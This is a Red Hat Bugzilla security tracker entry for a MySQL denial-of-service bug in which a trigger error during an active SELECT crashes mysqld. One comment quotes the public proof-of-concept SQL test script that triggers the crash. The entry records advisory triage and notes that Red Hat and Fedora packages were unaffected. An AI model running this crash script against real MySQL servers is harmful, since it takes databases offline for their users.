Bug 718257

Summary: mysql: DoS (crash) by processing error arising during trigger execution, when active SELECT statement present (MySQL bug#55421)
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: byte, tgl
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2012-02-14 14:30:12 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Bug Depends On:    
Bug Blocks: 717721    

Description Jan Lieskovsky 2011-07-01 15:28:12 UTC 
It was found that MySQL server did not properly handle processing of error message, which arose during trigger execution, when another active SELECT SQL statement was present. A remote attacker, valid SQL user could use this flaw to cause denial of service (mysqld daemon crash) via specially-crafted SQL query.

References:
[1] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html
[2] http://bugs.mysql.com/bug.php?id=55421

Note:
On Red Hat Enterprise Linux systems exploitation of this issue would lead only to temporary denial of service, since mysqld daemon gets automatically restarted upon encountering a crash.
Comment 1 Jan Lieskovsky 2011-07-01 15:29:51 UTC 
Public PoC from [2]:
====================

# Non-concurrent MTR test

--disable_warnings
DROP DATABASE IF EXISTS celosia_features;
--enable_warnings

CREATE DATABASE celosia_features;
USE celosia_features;

GRANT ALL ON celosia_features.* TO 'systuser'@'localhost';

--connect(con1,localhost,systuser,,celosia_features)

CREATE TABLE t_celosia_1 (
  `user_num` bigint(20) unsigned DEFAULT NULL,
  `year` year(4) DEFAULT NULL,
  `modified` time DEFAULT NULL
);
INSERT INTO t_celosia_1 VALUES (7197513499,1937,'20:36:48');

CREATE TRIGGER celosia_features.upd_t_celosia_1
BEFORE UPDATE ON t_celosia_1 FOR EACH ROW SET new.modified = NOW();

CREATE TABLE `t_celosia_2` (
  `user_num` char(5) DEFAULT NULL,
  `year` year(2) DEFAULT NULL,
  `modified` timestamp NOT NULL
);

INSERT INTO `t_celosia_2` VALUES ('32264',56,'2010-07-18 17:36:31');

--connection default

REVOKE ALL PRIVILEGES, GRANT OPTION FROM 'systuser'@'localhost';

UPDATE IGNORE t_celosia_1 table1, t_celosia_2 table2
SET table1.user_num = 192720, table2.user_num = '39582'
WHERE table1.year = '1937' AND table2.year = '56';

# Cleanup

DROP DATABASE celosia_features;
DROP USER 'systuser'@'localhost';

--exit
Comment 3 Jan Lieskovsky 2011-07-01 15:33:52 UTC 
This issue did NOT affect the versions of the mysql package, as shipped with
Red Hat Enterprise Linux 4, 5, and 6.

--

This issue did NOT affect the versions of the mysql package, as shipped with
Fedora release of 14 and 15.